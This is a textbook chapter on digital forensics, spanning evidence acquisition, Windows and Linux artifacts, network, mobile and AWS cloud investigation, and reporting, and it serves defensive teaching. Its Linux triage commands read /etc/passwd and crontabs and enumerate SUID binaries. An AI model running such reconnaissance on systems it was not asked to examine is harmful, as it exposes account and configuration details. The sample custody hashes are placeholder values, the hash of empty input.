Chapter 27: Digital Forensics¶
Overview¶
Digital forensics is the application of scientific methods to collect, preserve, analyze, and present digital evidence in a manner that maintains its integrity and admissibility. From evidence acquisition through court-ready reporting, forensic analysts reconstruct what happened, when, and by whom — answering questions that determine criminal liability, civil damages, regulatory compliance, and security posture improvements. This chapter covers forensic methodology, disk forensics, memory forensics, network forensics, mobile forensics, and cloud/container forensics.
Learning Objectives¶
By the end of this chapter, students SHALL be able to:
- Apply the forensic process (preservation, acquisition, analysis, reporting) correctly
- Perform forensic disk acquisition with proper write-blocking and chain of custody
- Analyze Windows and Linux file systems to recover artifacts, deleted files, and timelines
- Conduct network forensics using packet captures and NetFlow analysis
- Perform mobile device forensics using industry-standard tools
- Adapt forensic methodology for cloud environments and containerized workloads
Prerequisites¶
- Chapter 9 (Incident Response Lifecycle)
- Basic understanding of file systems (NTFS, ext4)
- Familiarity with Linux command line
- Chapter 18 (Malware Analysis) for memory forensics context
Why This Matters
Improper digital forensics can render evidence inadmissible, enable guilty parties to escape accountability, and prevent organizations from understanding root causes. In the Target breach (2013), forensic analysis of 40 million stolen credit cards traced back to a HVAC vendor's compromised credentials. In the Sony Pictures hack (2014), forensic analysis of the malware wiper identified specific Korean-language keyboard input evidence. Without rigorous forensic methodology, these attributions would have been impossible.
27.1 Forensic Principles and Legal Foundation¶
27.1.1 Core Forensic Principles¶
| Principle | Description |
|---|---|
| Preservation | Never modify original evidence; work from verified copies |
| Documentation | Record every action taken, tool used, and result observed |
| Chain of Custody | Track who possessed evidence, when, and under what conditions |
| Reproducibility | Another examiner with same tools and evidence MUST reach same conclusion |
| Integrity | Cryptographic hashes verify evidence was not altered |
| Relevance | Collect only evidence relevant to the investigation |
27.1.2 Legal Framework¶
EVIDENCE ADMISSIBILITY REQUIREMENTS:
United States (Federal Rules of Evidence):
├── Rule 901: Authentication — evidence is what it purports to be
├── Rule 902: Self-authenticating — digital records with proper certification
├── Rule 1002-1003: Best evidence rule — original preferred
└── Daubert Standard: Expert testimony must be scientifically valid
Chain of Custody Documentation:
├── Who collected the evidence
├── When (timestamp with timezone)
├── Where (physical location)
├── How (tools and method)
├── What condition it was in
├── All transfers of possession documented
└── Storage conditions during preservation
27.1.3 Order of Volatility¶
Evidence SHALL be collected from most volatile to least volatile:
1. CPU registers, cache → seconds
2. RAM (physical memory) → until powered off
3. Network connections, routing tables → minutes
4. Running processes → until process terminates
5. Open files, temp files → until file closed/deleted
6. Disk (non-volatile storage) → until overwritten
7. Remote logging, SIEM, cloud logs → retention policy dependent
8. Physical media (tapes, printed docs) → years
27.2 Evidence Acquisition¶
27.2.1 Disk Acquisition¶
# NEVER analyze original media directly
# Always create a forensic copy (bit-for-bit duplicate)
# Write blocker — hardware or software
# Hardware preferred: Tableau Forensic Bridge, WiebeTech
# Prevent any writes to source disk during acquisition
# dcfldd — enhanced dd with hashing
dcfldd if=/dev/sdb of=/evidence/target_disk.dd \
hash=sha256 \
hashlog=/evidence/target_disk.sha256 \
bs=4096 \
noerror \
conv=sync
# Verify acquisition integrity
sha256sum /evidence/target_disk.dd
# Compare to hash generated during acquisition — MUST match
# FTK Imager (Windows) — industry standard GUI tool
# Creates .E01 (EnCase Expert Witness) format with embedded hashes
# Logical acquisition (when physical not possible)
# Active systems — targeted collection of specific artifacts
# Kape (Kroll Artifact Parser and Extractor)
kape.exe --tsource C: --tdest /evidence/triage/ --target !SANS_Triage
27.2.2 Memory Acquisition¶
# Windows live memory
winpmem_mini_x64_rc2.exe C:\Evidence\memory.raw
# Alternative: DumpIt, Belkasoft RAM Capturer, FTK Imager (memory)
# Linux live memory
# LiME (Linux Memory Extractor) — kernel module
git clone https://github.com/504ensicsLabs/LiME
cd LiME/src && make
sudo insmod lime-$(uname -r).ko "path=/tmp/memory.lime format=lime"
# Virtual machine memory
# VMware: Suspend → examine .vmem file
# Hyper-V: Checkpoint creates AVHD/AVHDX (includes RAM)
# VirtualBox: Take snapshot → includes RAM state
# Verify
sha256sum memory.raw > memory.raw.sha256
27.2.3 Chain of Custody Form¶
DIGITAL EVIDENCE CHAIN OF CUSTODY FORM
════════════════════════════════════════════════════════
Case Number: IR-2026-0142
Evidence Number: DISK-001
Description: WD Black 2TB SSD, Serial# WD-XXXXXXXXXX
Collection Date/Time: 2026-01-15 14:37:22 UTC
Collection Location: Finance Department, Server Room B
Collected By: Jane Smith, GCFE #12345
Collection Method: FTK Imager 4.7.1.2, write-blocked via Tableau TD3
SHA256 (source): e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA256 (copy): e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Match: YES ✓
Packaging: Heat-sealed anti-static bag, tamper-evident seal #A7821
Storage: Evidence locker #14, controlled access, 68°F, <50% humidity
TRANSFER LOG:
Date | From | To | Reason | Seal Intact?
2026-01-15 | Jane Smith | Evidence Locker | Initial storage | N/A
2026-01-16 | Evidence Locker | Lab Room 3 | Analysis begins | YES ✓
════════════════════════════════════════════════════════
27.3 Windows Forensic Artifacts¶
27.3.1 Critical Windows Artifact Locations¶
| Artifact | Location | Forensic Value |
|---|---|---|
| Registry | C:\Windows\System32\config{SAM,SYSTEM,SOFTWARE,SECURITY,NTUSER.DAT} | User accounts, installed software, USB history, run keys, typed URLs |
| Event Logs | C:\Windows\System32\winevt\Logs\ | Logon events, process creation, PowerShell, object access |
| Prefetch | C:\Windows\Prefetch\ | Evidence programs executed (name, count, last run time) |
| LNK Files | %APPDATA%\Microsoft\Windows\Recent\ | Files opened (full path, timestamps, even from removable media) |
| Shellbags | HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell | Folders accessed (persists after deletion) |
| SRUM | C:\Windows\System32\sru\SRUDB.dat | App resource usage, network usage per application |
| Browser History | %APPDATA%\Local{Chrome,Firefox,Edge}\User Data | Websites visited, downloads, form data |
| Pagefile/Hiberfil | C:\pagefile.sys, C:\hiberfil.sys | Volatile memory artifacts spilled to disk |
| Volume Shadow Copies | System Volume Information | Previous versions of files (if not deleted) |
27.3.2 Windows Registry Forensics¶
# RegRipper — automated registry artifact extraction
rip.pl -r /evidence/NTUSER.DAT -f ntuser
rip.pl -r /evidence/SYSTEM -f system
rip.pl -r /evidence/SOFTWARE -f software
# USB device history (SYSTEM hive)
# HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
rip.pl -r /evidence/SYSTEM -p usbstor
# Most recently used (MRU) files (NTUSER.DAT)
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
rip.pl -r /evidence/NTUSER.DAT -p recentdocs
# UserAssist — GUI program execution count + last run
rip.pl -r /evidence/NTUSER.DAT -p userassist
# Run keys — persistence mechanisms
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
rip.pl -r /evidence/NTUSER.DAT -p run
27.3.3 Windows Event Log Analysis¶
# Key Event IDs for forensic analysis
# Authentication
# 4624 - Successful logon (Type: 2=local, 3=network, 10=RDP, 11=cached)
# 4625 - Failed logon (SubStatus indicates reason)
# 4648 - Explicit credential logon (runas, scheduled tasks)
# 4768 - Kerberos TGT requested
# 4776 - NTLM authentication
# Process
# 4688 - Process created (requires process tracking enabled)
# 4689 - Process terminated
# Account Changes
# 4720 - User account created
# 4722 - User account enabled
# 4723/4724 - Password change/reset
# 4728/4732 - User added to security group
# Object Access (requires SACL configured)
# 4663 - Object accessed
# 4660 - Object deleted
# PowerShell
# 4103 - Pipeline execution (Module logging)
# 4104 - Script block logging (captures full script)
# Get PowerShell execution history
Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational |
Where-Object {$_.Id -eq 4104} |
Select-Object TimeCreated, Message |
Export-Csv powershell_history.csv
27.3.4 Windows Timeline Reconstruction¶
# Plaso/log2timeline — comprehensive timeline generator
# Parse all artifacts and create super-timeline
log2timeline.py --storage-file /evidence/timeline.plaso \
--partition all \
/evidence/target_disk.dd
# Filter timeline (psort)
psort.py -z UTC -o l2tcsv /evidence/timeline.plaso \
"date > '2026-01-14 00:00:00' AND date < '2026-01-16 00:00:00'" \
> /evidence/filtered_timeline.csv
# Mactime (from SleuthKit)
fls -r -m / target_disk.dd > bodyfile.txt
mactime -b bodyfile.txt -d 2026-01-14 2026-01-16 > mactime_timeline.csv
27.4 Linux Forensic Artifacts¶
27.4.1 Critical Linux Artifact Locations¶
| Artifact | Location | Forensic Value |
|---|---|---|
| Auth logs | /var/log/auth.log, /var/log/secure | Login attempts, sudo usage, SSH |
| Bash history | ~/.bash_history, /root/.bash_history | Commands executed |
| Cron jobs | /etc/cron*, /var/spool/cron | Persistence mechanisms |
| Startup scripts | /etc/rc.d/, /etc/init.d/, systemd units | Persistence |
| SSH authorized_keys | ~/.ssh/authorized_keys | Backdoor access keys |
| Syslog | /var/log/syslog, /var/log/messages | System events |
| Audit log | /var/log/audit/audit.log | File access, system calls (if auditd) |
| Web server logs | /var/log/apache2/, /var/log/nginx/ | Web-based attacks |
| Recently modified | find / -mtime -7 | Files changed in last 7 days |
| /tmp /dev/shm | /tmp, /dev/shm | Malware staging areas |
# Linux forensic triage commands
# (Run on live system or via chroot on mounted image)
# Find recently modified files
find / -newer /tmp/reference_time -type f 2>/dev/null | grep -v "/proc\|/sys\|/dev"
# Hidden directories/files
find / -name ".*" -type d 2>/dev/null | grep -v ".config\|.local"
# SUID/SGID files (privilege escalation)
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Network connections
ss -tulnap
netstat -anp
# Running processes
ps auxf
ls -la /proc/*/exe 2>/dev/null | grep deleted # Deleted but running binaries
# Scheduled tasks (all cron locations)
for spool in /var/spool/cron/crontabs/*; do echo "--- $spool ---"; cat "$spool"; done
cat /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/*
# Users and groups
cat /etc/passwd | grep -v nologin | grep -v false # Interactive users
lastlog # Last login for all users
last -100 # Recent logins
27.5 Network Forensics¶
27.5.1 Packet Capture Analysis¶
# Wireshark — GUI packet analysis
# Capture filter (during capture): host 192.168.1.100 and port not 80
# Display filter (post-capture): ip.addr == 192.168.1.100 && http
# TShark — command line Wireshark
# Extract all HTTP POST requests
tshark -r capture.pcap -Y "http.request.method == POST" \
-T fields -e frame.time -e ip.src -e ip.dst -e http.request.uri -e http.file_data
# Reconstruct files from capture
NetworkMiner -r capture.pcap # Extracts files, credentials, DNS
# Follow TCP stream for specific connection
tshark -r capture.pcap -Y "ip.addr == 185.220.1.1" -qz follow,tcp,ascii,0
# Extract DNS queries (C2 detection)
tshark -r capture.pcap -Y "dns.flags.response == 0" \
-T fields -e frame.time -e ip.src -e dns.qry.name
# Zeek — network security monitoring (production-grade)
zeek -r capture.pcap local
# Generates: conn.log, dns.log, http.log, ssl.log, weird.log, files.log, etc.
cat conn.log | zeek-cut ts id.orig_h id.resp_h id.resp_p duration orig_bytes
27.5.2 NetFlow Analysis¶
# nfdump — analyze NetFlow/IPFIX data
# Find top talkers
nfdump -r /netflow/nfcapd.202601150000 -s srcip/bytes -n 20
# Find connections to known bad IPs
nfdump -r /netflow/ -R 2026-01-15/2026-01-16 \
"dst ip in [185.220.1.0/24]" \
-o extended
# Detect port scanning
nfdump -r /netflow/nfcapd.202601150000 \
"flags S and not flags AFRP" \
-s srcip/flows -n 20
27.6 Mobile Device Forensics¶
27.6.1 Mobile Forensic Process¶
MOBILE FORENSIC ACQUISITION TYPES:
1. Manual Extraction
- Photographing the screen
- Limited; no deleted data
- No tools required
2. Logical Acquisition
- Uses device's backup protocol (iTunes, ADB)
- Active data only; no deleted files
- Tools: Cellebrite UFED, Oxygen, GrayKey
3. File System Acquisition
- Full file system via USB
- Requires device unlock or exploit
- Recovers most deleted data
4. Physical Acquisition (Full Chip-Off)
- NAND chip physically removed and read
- Most complete; destructive
- Requires specialized hardware
- Tools: Cellebrite UFED, MSAB XRY
5. Cloud Extraction
- iCloud, Google Account, Samsung Cloud
- Backup data only; requires credentials or legal process
27.6.2 Cellebrite UFED — Industry Standard¶
Cellebrite UFED (Universal Forensic Extraction Device):
├── Supports 30,000+ device profiles
├── Android: ADB, MTK exploit, custom bootloader, chip-off
├── iOS: Logical backup (iTunes), BFU (Before First Unlock) extraction,
│ AFU (After First Unlock) via GrayKey/Cellebrite Premium
└── Output: UFDR file analyzed in Cellebrite Physical Analyzer
Key Artifacts Recovered:
├── SMS/iMessage (including deleted)
├── Call logs
├── WhatsApp, Signal, Telegram messages
├── Location history (GPS, cell towers, WiFi)
├── Browsing history
├── Photos/videos (including deleted)
├── Application data (banking apps, email)
└── Password keychain (iOS, if unlocked)
27.7 Cloud and Container Forensics¶
27.7.1 Cloud Forensic Challenges¶
Traditional Forensics → Cloud Forensics:
├── Disk image → API-based log export only
├── Physical server → No direct hardware access
├── RAM dump → Not available for managed services
├── Network capture → VPC Flow Logs (metadata only, not payload)
└── Chain of custody → Legal hold via cloud provider APIs
27.7.2 AWS Forensic Process¶
# Preserve evidence — create forensic volume from snapshot
INSTANCE_ID="i-0abc123def456789"
# 1. Create snapshot of each volume
VOLUME_IDS=$(aws ec2 describe-instances --instance-ids $INSTANCE_ID \
--query "Reservations[].Instances[].BlockDeviceMappings[].Ebs.VolumeId" \
--output text)
for VOL_ID in $VOLUME_IDS; do
aws ec2 create-snapshot \
--volume-id $VOL_ID \
--description "Forensic snapshot - IR-2026-0142 - $(date -u +%Y%m%d-%H%M%S)" \
--tag-specifications "ResourceType=snapshot,Tags=[{Key=Purpose,Value=Forensics},{Key=Case,Value=IR-2026-0142}]"
done
# 2. Isolate instance (block all traffic)
aws ec2 revoke-security-group-ingress --group-id sg-xxx --protocol all --port all --cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress --group-id sg-forensics --protocol tcp --port 22 --cidr ANALYST_IP/32
# 3. Export CloudTrail for investigation period
aws cloudtrail lookup-events \
--start-time 2026-01-01T00:00:00Z \
--end-time 2026-01-15T23:59:59Z \
--max-results 50 \
> cloudtrail_evidence.json
# 4. Create forensic workstation in same region
# Attach forensic snapshot as additional volume (read-only)
aws ec2 run-instances --image-id ami-forensics --instance-type t3.xlarge \
--block-device-mappings "[{\"DeviceName\":\"/dev/xvdf\",\"Ebs\":{\"SnapshotId\":\"$SNAP_ID\",\"DeleteOnTermination\":true}}]"
27.8 Forensic Reporting¶
27.8.1 Forensic Report Structure¶
DIGITAL FORENSIC EXAMINATION REPORT
EXECUTIVE SUMMARY
- Case overview, key findings, conclusions
EXAMINER INFORMATION
- Name, certifications, organization, contact
EVIDENCE RECEIVED
- Evidence item list with hashes, acquisition date, chain of custody
FORENSIC TOOLS USED
- Tool name, version, validation status
EXAMINATION METHODOLOGY
- Step-by-step process followed
FINDINGS
- Finding 1: [Timestamped event with evidence references]
- Finding 2: [...]
- ...
(Each finding: description, evidence basis, artifact location, screenshot/log)
TIMELINE (Chronological)
- Complete reconstructed timeline from earliest to latest event
CONCLUSIONS
- Answer to specific investigative questions
- Limitations of analysis
APPENDICES
A: Hash values
B: Tool outputs
C: Evidence photographs
D: Glossary
27.9 Certifications and Career Path¶
| Certification | Organization | Level | Focus |
|---|---|---|---|
| GCFE (GIAC Certified Forensic Examiner) | GIAC/SANS | Intermediate | Windows forensics |
| GCFA (GIAC Certified Forensic Analyst) | GIAC/SANS | Advanced | Advanced forensics + IR |
| EnCE (EnCase Certified Examiner) | OpenText | Advanced | EnCase platform expertise |
| CCE (Certified Computer Examiner) | ISFCE | Advanced | Vendor-neutral DFIR |
| CFCE (Certified Forensic Computer Examiner) | IACIS | Advanced | Law enforcement focus |
| CHFI (Computer Hacking Forensic Investigator) | EC-Council | Intermediate | Broad forensics overview |
27.10 Benchmark Controls¶
| Control ID | Title | Requirement |
|---|---|---|
| Nexus SecOps-DF-01 | Forensic Readiness | Documented forensic readiness plan; tools staged and validated |
| Nexus SecOps-DF-02 | Log Retention | Security logs retained for minimum 12 months; immutable storage |
| Nexus SecOps-DF-03 | Chain of Custody | Formal evidence handling procedures documented and trained |
| Nexus SecOps-DF-04 | Forensic Capability | At minimum one GCFE/GCFA-certified analyst on team or retainer |
| Nexus SecOps-DF-05 | Cloud Forensics | Cloud forensic procedures documented for each cloud provider used |
| Nexus SecOps-DF-06 | Legal Hold | Documented process for evidence preservation upon legal notification |
Exam Prep & Certifications¶
Relevant Certifications
The topics in this chapter align with the following certifications:
- GIAC GCFE — Domains: Windows Forensics, Evidence Preservation, Artifact Analysis
- GIAC GCFA — Domains: Advanced Forensic Analysis, Memory Forensics, Timeline Analysis
- EnCE — Domains: Digital Evidence Collection, EnCase Forensic Methodology
- GIAC GCIH — Domains: Incident Handling, Forensic Investigation
Key Terms¶
Chain of Custody — The documented record of every person who had possession of evidence from collection through presentation, ensuring its integrity and admissibility.
KAPE (Kroll Artifact Parser and Extractor) — A forensic triage tool that efficiently collects and processes common forensic artifacts from Windows systems.
MFT ($MFT — Master File Table) — NTFS data structure containing records for every file and directory on a volume, including filename, timestamps, attributes, and physical location.
Order of Volatility — The principle that forensic collection should proceed from most volatile (RAM) to least volatile (physical media) to preserve the maximum amount of evidence.
Plaso / log2timeline — An open-source forensic timeline tool that parses hundreds of artifact types and creates a unified super-timeline for analysis.
Write Blocker — Hardware or software device that intercepts write commands to a storage device, ensuring forensic acquisition does not modify the original evidence.